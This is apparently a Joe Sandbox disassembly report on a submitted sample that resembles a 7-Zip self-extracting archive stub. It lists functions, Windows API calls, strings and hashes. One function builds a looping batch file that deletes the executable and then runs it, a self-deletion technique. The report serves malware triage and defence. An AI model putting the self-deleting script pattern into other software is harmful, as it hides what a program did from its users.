Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
Instruction ID: 1deff6650f640bb2d9dcab77f147087c60d03763b1f3dd6742a57df9d51469cf
Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
Instruction Fuzzy Hash: 5F022B72A043124BDB09CE28C59027DBBE2FBC4345F150A3EE89667BC4D7789954C7DA

Function 00413D43 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
Instruction ID: d276be45ba9710969d4d69a2fbd68599cb80de3b2bdcae4a446b37c04d3c8c9c
Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
Instruction Fuzzy Hash: 6A41C360C14B9652EB134F7CC842272B320BFAB244F00D75AFDD179922FB3266446255

Function 00413370 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
Instruction ID: 6fc8e050a97d926f750d5da14c4a761a5f22703977f0277d1b92a118b0bcd8c9
Opcode Fuzzy Hash: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
Instruction Fuzzy Hash: 2F212E7B370D4607EB0C8939AE336BE2582E340346F88953DD247C5784EE9E9954810D

Function 004139D1 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction ID: 593f74aba8cbd25357504dd2d18fce0fb38989f15731237b119c96727be92a00
Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction Fuzzy Hash: 7521C53291462547CB02CE6EE4845A7F392FFC436BF174767ED8467290C629A85486E0

Function 00413AAB Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction ID: f31e75e8446499c6638a38678b48eff386f2da62f80cbfd2527233499c21bf4b
Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction Fuzzy Hash: 21213B7291842587C701DF1DE4886B7B3E1FFC431AF678A3BD9828B182C638E885D794

Function 0040503E Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 213threadprocesssynchronizationCOMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?), ref: 0040505F
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00405122
??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0040512A
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00405132
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 0040513A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 00405142
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040514A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00405152
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040515A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00405162
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040516A
GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405183
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004051B4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004051BF
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004051C7
CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00405203
SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040524C
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405255
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040525C
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040526B
GetExitCodeProcess.KERNEL32(?,?), ref: 00405274
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040527F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0040528B
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405292
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040529D

Strings

sfxwaitall, xrefs: 00405085
" -, xrefs: 0040508A

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
String ID: " -$sfxwaitall
API String ID: 2734624574-3991362806
Opcode ID: 09ebb3d538a5a8633bfcfd653b7b7202ebab26aa0208b363f6e46b16e2ca7b16
Instruction ID: b3327515afe2f0509fed3fa0d446ddd4546a9b02c844584286d91d1d95b89973
Opcode Fuzzy Hash: 09ebb3d538a5a8633bfcfd653b7b7202ebab26aa0208b363f6e46b16e2ca7b16
Instruction Fuzzy Hash: 73614DB2800148BBDF11BFA1DC45EDF3B6CFF54308F10853AFA15A21A1DA399A559F68

Function 00405304 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,?,00000000), ref: 0040534B
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
??3@YAXPAX@Z.MSVCRT(?), ref: 0040543C
CloseHandle.KERNEL32(00419858), ref: 00405445
SetFileAttributesW.KERNEL32(00406D05,00000000), ref: 0040545C
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
??3@YAXPAX@Z.MSVCRT(?), ref: 00405477
??3@YAXPAX@Z.MSVCRT(?), ref: 00405483
??3@YAXPAX@Z.MSVCRT(00406D05,?), ref: 00405489
??3@YAXPAX@Z.MSVCRT(00406D05,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00406D05,00419858), ref: 004054B7

Strings

open, xrefs: 00405468
", xrefs: 004053BE, 004053C3, 00405407
if exist ", xrefs: 004053CC
" goto Repeat, xrefs: 004053E5
7ZSfx%03x.cmd, xrefs: 0040535D
del ", xrefs: 004053A4, 004053A9, 004053F2
:Repeat, xrefs: 00405397

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
API String ID: 3007203151-3467708659
Opcode ID: 592e6a1c6e1d38efc50c661a525fe8aff8731a4a0da7546c5a3d4b9ca7fa2448
Instruction ID: d0d69a7dd8ff82dd971fb120c5bc6d20105d604efb913bdcb2d31d3208e79299
Opcode Fuzzy Hash: 592e6a1c6e1d38efc50c661a525fe8aff8731a4a0da7546c5a3d4b9ca7fa2448
Instruction Fuzzy Hash: 8E418E31C00109BADB11ABA0DC86DEF7779EF14319F50802AF515761E1EB785E86DB68

Function 0040312D Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00403140
lstrcmpiA.KERNEL32(?,STATIC), ref: 00403153
GetWindowLongW.USER32(?,000000F0), ref: 00403160

Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118

??3@YAXPAX@Z.MSVCRT(?), ref: 0040318D
GetParent.USER32(?), ref: 0040319B
LoadLibraryA.KERNEL32(riched20), ref: 004031AF
GetMenu.USER32(?), ref: 004031C2
SetThreadLocale.KERNEL32(00000419), ref: 004031CF
CreateWindowExW.USER32(00000000,RichEdit20W,004154C8,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004031FF
DestroyWindow.USER32(?), ref: 00403210
SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00403225
GetSysColor.USER32(0000000F), ref: 00403229
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00403237
SendMessageW.USER32(00000000,00000461,?,?), ref: 00403262
??3@YAXPAX@Z.MSVCRT(?), ref: 00403267
??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040326F

Strings

STATIC, xrefs: 0040314A
riched20, xrefs: 004031AA
RichEdit20W, xrefs: 004031F9
{\rtf, xrefs: 00403176

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
String ID: RichEdit20W$STATIC$riched20${\rtf
API String ID: 3514532227-2281146334
Opcode ID: 649788af889b09317d6ffdec884ca6b8992534c431825e7763816d5c9685ffe6
Instruction ID: 373b527b6ca097a0cf97d4fb6958eb329f6bb70dd43407f4b4eeb9307f1859e1
Opcode Fuzzy Hash: 649788af889b09317d6ffdec884ca6b8992534c431825e7763816d5c9685ffe6
Instruction Fuzzy Hash: 61319E72900509FFDB01AFA4DC49EEF7BBDAF48716F108036F605F6190DA788A418B68

Function 004086EB Relevance: 34.8, APIs: 23, Instructions: 265windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
LoadIconW.USER32(00000000), ref: 00408717
GetSystemMetrics.USER32(00000032), ref: 0040872B
GetSystemMetrics.USER32(00000031), ref: 00408730
GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
LoadImageW.USER32(00000000), ref: 0040873C
SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
GetDlgItem.USER32(?,000004B2), ref: 00408781
GetDlgItem.USER32(?,000004B2), ref: 0040878B
GetWindowLongW.USER32(?,000000F0), ref: 00408797
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
GetDlgItem.USER32(?,000004B5), ref: 004087B4
GetDlgItem.USER32(?,000004B5), ref: 004087C2
GetWindowLongW.USER32(?,000000F0), ref: 004087CE
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
GetWindow.USER32(?,00000005), ref: 004088C3
GetWindow.USER32(?,00000005), ref: 004088DF
GetWindow.USER32(?,00000005), ref: 004088F7
GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00408AB5), ref: 00408957
LoadIconW.USER32(00000000), ref: 0040895E
GetDlgItem.USER32(?,000004B1), ref: 0040897D
SendMessageW.USER32(00000000), ref: 00408980

Part of subcall function 00407B0D: GetDlgItem.USER32(?,?), ref: 00407B17
Part of subcall function 00407B0D: GetWindowTextLengthW.USER32(00000000), ref: 00407B1E

Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
String ID:
API String ID: 3694754696-0
Opcode ID: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
Instruction ID: ec505544c7bb35dede6d5bcefb07895398d021ded876e535e02418492f258e54
Opcode Fuzzy Hash: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
Instruction Fuzzy Hash: D671F8B1344705ABE6117B619E4AF3B7659DB80714F10443EF6827A2E2CFBCAC018A5E

Function 00404B06 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 207stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,004166B8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE2

Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
Part of subcall function 00402187: lstrcmpiW.KERNEL32(009B8FD0,00404926), ref: 0040224B
Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(009B8FD0), ref: 0040225B
Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303

_wtol.MSVCRT ref: 00404CDF
_wtol.MSVCRT ref: 00404CFB

Strings

GUIFlags, xrefs: 00404C41, 00404C46, 00404C62
ExtractDialogWidth, xrefs: 00404CC1
ErrorTitle, xrefs: 00404B82
ExtractCancelText, xrefs: 00404CA4
Title, xrefs: 00404B14
ExtractDialogText, xrefs: 00404CB0
GUIMode, xrefs: 00404BF7
OverwriteMode, xrefs: 00404C24
CancelPrompt, xrefs: 00404D34
ExtractPathTitle, xrefs: 00404D04
WarningTitle, xrefs: 00404B9A
ExtractPathWidth, xrefs: 00404CE8
ExtractPathText, xrefs: 00404D1C
Progress, xrefs: 00404BCA
MiscFlags, xrefs: 00404C74, 00404C79, 00404C95
ExtractTitle, xrefs: 00404BB2

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle
API String ID: 2725485552-1675048025
Opcode ID: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
Instruction ID: efab4658e061a586f4080eb8d96ca385680a2b42527defa3ddb57561e196b8fa
Opcode Fuzzy Hash: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
Instruction Fuzzy Hash: F151B8F6E01104BADB11AF616D8ADEF36ACDE41708725443FF904F22C2E6BD8E85466D

Function 00401EB2 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 00401EBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
GetObjectW.GDI32(?,00000018,?), ref: 00401F12
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
CreateCompatibleDC.GDI32(?), ref: 00401F35
CreateCompatibleDC.GDI32(?), ref: 00401F3C
SelectObject.GDI32(00000000,?), ref: 00401F4A
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
SelectObject.GDI32(00000000,00000000), ref: 00401F60
SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
SelectObject.GDI32(00000000,?), ref: 00401F9D
SelectObject.GDI32(00000000,?), ref: 00401FA3
DeleteDC.GDI32(00000000), ref: 00401FAC
DeleteDC.GDI32(00000000), ref: 00401FAF
ReleaseDC.USER32(00000000,?), ref: 00401FB6
ReleaseDC.USER32(00000000,?), ref: 00401FC5
CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401FD2

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
String ID:
API String ID: 3462224810-0
Opcode ID: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
Instruction ID: f87cdcd409c0e6d8f104c470e9418599ce0c3db21cc9cfda4b735dde8093d4f2
Opcode Fuzzy Hash: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
Instruction Fuzzy Hash: B0310676D40208FFDF115BE1DD48EEF7FB9EB88761F108066FA04A61A0C6754A50AFA4

Function 00401FDD Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00401FEF
lstrcmpiA.KERNEL32(?,STATIC), ref: 00402006
GetWindowLongW.USER32(?,000000F0), ref: 00402019
GetMenu.USER32(?), ref: 0040202E

Part of subcall function 00401DC9: GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
Part of subcall function 00401DC9: SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
Part of subcall function 00401DC9: LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
Part of subcall function 00401DC9: LockResource.KERNEL32(00000000), ref: 00401E2B

GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402060
memcpy.MSVCRT(00000000,00000000,00000010), ref: 0040206D
CoInitialize.OLE32(00000000), ref: 00402076
CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402082
OleLoadPicture.OLEAUT32(?,00000000,00000000,00416E50,?), ref: 004020A7
GlobalFree.KERNEL32(00000000), ref: 004020B7

Part of subcall function 00401EB2: GetWindowDC.USER32(00000000), ref: 00401EBE
Part of subcall function 00401EB2: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
Part of subcall function 00401EB2: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
Part of subcall function 00401EB2: GetObjectW.GDI32(?,00000018,?), ref: 00401F12
Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F35
Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F3C
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F4A
Part of subcall function 00401EB2: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,00000000), ref: 00401F60
Part of subcall function 00401EB2: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
Part of subcall function 00401EB2: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
Part of subcall function 00401EB2: GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F9D
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401FA3
Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAC
Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAF
Part of subcall function 00401EB2: ReleaseDC.USER32(00000000,?), ref: 00401FB6

GetObjectW.GDI32(00000000,00000018,?), ref: 004020E9
SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004020FD
SendMessageW.USER32(00000010,00000172,00000000,?), ref: 0040210F
GlobalFree.KERNEL32(00000000), ref: 00402124

Strings

STATIC, xrefs: 00401FFD
IMAGES, xrefs: 00402038

Memory Dump Source

Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd

Similarity

API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
String ID: IMAGES$STATIC
API String ID: 4202116410-1168396491
Opcode ID: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
Instruction ID: 87364bf851807a9d3783278cfb79ffb10547d227827cc6f6944e766e6ae994b9
Opcode Fuzzy Hash: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
Instruction Fuzzy Hash: 00418F31900108FFCB119FA0DC4CEEF7F79EF49741B008065FA05A61A0D7798A55DB64

Function 00408B36 Relevance: 27.1, APIs: 18, Instructions: 144windowcomtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE

GetDlgItem.USER32(?,000004B8), ref: 00408B63
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B72
GetDlgItem.USER32(?,000004B5), ref: 00408BB9
GetWindowLongW.USER32(00000000,000000F0), ref: 00408BBE
GetDlgItem.USER32(?,000004B5), ref: 00408BCE
SetWindowLongW.USER32(00000000), ref: 00408BD1
GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF7
EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C09
GetDlgItem.USER32(?,000004B4), ref: 00408C13
SetFocus.USER32(00000000), ref: 00408C16
SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C45
CoCreateInstance.OLE32(00416E80,00000000,00000001,00416B08,?), ref: 00408C69
